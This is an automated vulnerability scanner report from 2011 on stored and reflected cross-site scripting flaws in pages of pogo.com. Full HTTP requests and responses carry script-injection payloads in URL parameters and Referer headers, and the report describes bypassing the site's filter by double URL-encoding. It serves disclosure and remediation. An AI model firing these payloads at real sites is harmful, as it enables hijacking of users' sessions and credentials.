XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, pogo.com

Report generated by XSS.CX at Sat Jun 25 09:37:05 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (stored)

1.1. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [REST URL parameter 2]

1.2. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [REST URL parameter 2]

2. Cross-site scripting (reflected)

2.1. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [sourceid parameter]

2.2. http://www.pogo.com/login/Scripts/AC_RunActiveContent.js [Referer HTTP header]

2.3. http://www.pogo.com/login/entry.jsp [Referer HTTP header]

2.4. http://www.pogo.com/login/media/Pogo_General_LP_2.swf [Referer HTTP header]

2.5. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [Referer HTTP header]

3. Referer-dependent response

3.1. http://www.pogo.com/login/Scripts/AC_RunActiveContent.js

3.2. http://www.pogo.com/login/media/Pogo_General_LP_2.swf

3.3. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

4. Cross-domain Referer leakage

4.1. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

4.2. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

4.3. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

4.4. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

4.5. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

4.6. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

5. Email addresses disclosed

6. Content type incorrectly stated

7. Content type is not specified



1. Cross-site scripting (stored)  next
There are 2 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The value of REST URL parameter 2 submitted to the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp. The payload 31393</script>041f4ab8ff6 was submitted in the REST URL parameter 2. This input was returned unmodified in a subsequent request for the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request 1

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp31393</script>041f4ab8ff6?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&kw=free%20internet%20games&ad=6429295350&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Request 2

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&kw=free%20internet%20games&ad=6429295350&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:21 GMT
Server: Apache-Coyote/1.1
Content-Length: 12389


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
}
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp31393</script>041f4ab8ff6?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&kw=free%20internet%20games&ad=6429295350&sitetarget=";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="
...[SNIP]...

1.2. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The value of REST URL parameter 2 submitted to the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp. The payload 4d781</script><script>alert(1)</script>9d640d4f59f was submitted in the REST URL parameter 2. This input was returned unmodified in a subsequent request for the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request 1

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp4d781</script><script>alert(1)</script>9d640d4f59f?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=3E01A5E24CD32774E6EF83CEAF1EADF3.000099; com.pogo.unid=6618690632146297

Request 2

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=3E01A5E24CD32774E6EF83CEAF1EADF3.000099; com.pogo.unid=6618690632146297

Response 2

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:29 GMT
Server: Apache-Coyote/1.1
Content-Length: 12410


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
}
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp4d781</script><script>alert(1)</script>9d640d4f59f?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget=";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="pogo
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 5 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [sourceid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The value of the sourceid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12f2b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec356c9d923d was submitted in the sourceid parameter. This input was echoed as 12f2b</script><script>alert(1)</script>c356c9d923d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the sourceid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec356c9d923d&kw=free%20internet%20games&ad=6429295350&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:22 GMT
Server: Apache-Coyote/1.1
Content-Length: 12595


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b</script><script>alert(1)</script>c356c9d923d&kw=free%20internet%20games&ad=6429295350&sitetarget=";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="pogo";
s.eVar12="6618690632146297";
s.campaign="free_internet_g
...[SNIP]...

2.2. http://www.pogo.com/login/Scripts/AC_RunActiveContent.js [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /login/Scripts/AC_RunActiveContent.js

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df978</script><script>alert(1)</script>6085c15067d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login/Scripts/AC_RunActiveContent.js HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=df978</script><script>alert(1)</script>6085c15067d
Cookie: com.pogo.site=pogo; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922690996-New%7C1311514690996%3B; prod.JID=DFBED573C399BE6DE0C56C9A43B58D50.000274; com.pogo.unid=6618939740244558

Response

HTTP/1.1 404 /login/Scripts/AC_RunActiveContent.js
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:38:24 GMT
Server: Apache-Coyote/1.1
Content-Length: 4044


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>
   


...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=df978</script><script>alert(1)</script>6085c15067d";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(
...[SNIP]...

2.3. http://www.pogo.com/login/entry.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /login/entry.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7a30</script><script>alert(1)</script>44a7311bc87 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Fpogo-online-games%2Flp-GeneralPogo-withoutFB.jsp%3Fad%3D6429295350%26sourceid%3Dfree_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%25253c%25252fscript%25253e%25253cscript%25253ealert%252528document.location%252529%25253c%25252fscript%25253ec356c9d923d%26kw%3Dfree%2Binternet%2Bgames%26sitetarget%3D HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e7a30</script><script>alert(1)</script>44a7311bc87
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: com.pogo.site=pogo; s_pers=%20s_nr%3D1308922304648-New%7C1311514304648%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; prod.JID=C84030ABB66027F38F1EBD321C1C3F57.000144; com.pogo.unid=6618922560387636

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:37:55 GMT
Server: Apache-Coyote/1.1
Content-Length: 12481


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=e7a30</script><script>alert(1)</script>44a7311bc87";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="pogo";
s.eVar12="6618939740244558";
s.campaign="free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252f
...[SNIP]...

2.4. http://www.pogo.com/login/media/Pogo_General_LP_2.swf [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /login/media/Pogo_General_LP_2.swf

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30799</script><script>alert(1)</script>4c0d8e0492b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login/media/Pogo_General_LP_2.swf HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=30799</script><script>alert(1)</script>4c0d8e0492b
Cookie: com.pogo.site=pogo; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922705451-New%7C1311514705451%3B; prod.JID=DFBED573C399BE6DE0C56C9A43B58D50.000274; com.pogo.unid=6618939740244558

Response

HTTP/1.1 404 /login/media/Pogo_General_LP_2.swf
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:38:25 GMT
Server: Apache-Coyote/1.1
Content-Length: 4044


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>
   


...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=30799</script><script>alert(1)</script>4c0d8e0492b";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(
...[SNIP]...

2.5. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49471</script><script>alert(1)</script>881b68c5a42 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&kw=free%20internet%20games&ad=6429295350&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=49471</script><script>alert(1)</script>881b68c5a42

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:22 GMT
Server: Apache-Coyote/1.1
Content-Length: 12270


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=49471</script><script>alert(1)</script>881b68c5a42";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="pogo";
s.eVar12="6618690632146297";
s.campaign="free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001";
s.channel="g
...[SNIP]...

3. Referer-dependent response  previous  next
There are 3 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.



3.1. http://www.pogo.com/login/Scripts/AC_RunActiveContent.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pogo.com
Path:   /login/Scripts/AC_RunActiveContent.js

Request 1

GET /login/Scripts/AC_RunActiveContent.js HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Fpogo-online-games%2Flp-GeneralPogo-withoutFB.jsp%3Fad%3D6429295350%26sourceid%3Dfree_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%25253c%25252fscript%25253e%25253cscript%25253ealert%252528document.location%252529%25253c%25252fscript%25253ec356c9d923d%26kw%3Dfree%2Binternet%2Bgames%26sitetarget%3D
Cookie: com.pogo.site=pogo; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922690996-New%7C1311514690996%3B; prod.JID=DFBED573C399BE6DE0C56C9A43B58D50.000274; com.pogo.unid=6618939740244558

Response 1

HTTP/1.1 404 /login/Scripts/AC_RunActiveContent.js
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:38:23 GMT
Server: Apache-Coyote/1.1
Content-Length: 4347


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>
   


...[SNIP]...
nkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Fpogo-online-games%2Flp-GeneralPogo-withoutFB.jsp%3Fad%3D6429295350%26sourceid%3Dfree_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%25253c%25252fscript%25253e%25253cscript%25253ealert%252528document.location%252529%25253c%25252fscript%25253ec356c9d923d%26kw%3Dfree%2Binternet%2Bgames%26sitetarget%3D";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(omniture_java_version) != "undefined") { s.prop13=omniture_java_version; }
if (typeof(omniture_plugin_used) != "undefined") { s.prop24=omniture_plugin_used; }
s.eVar10=s.getTimeParting('h','-5','2011');
s.retrieveLightProfiles = 'lsccmp';
var s_code=s.t();if(s_code)document.write(s_code);
//--></script>
</div>
<!-- end of Omniture Tag -->




<div class="clear20"></div>
<div align="center">
   
   <img src="http://cdn.pogo.com/v/EhaoWQ/img/header/main/en_US/pogo/header-sec-auth-756.jpg" alt="" /><br />
   
       <div id="bodyWrap">
           <div class="whiteModule" id="pageHeader">
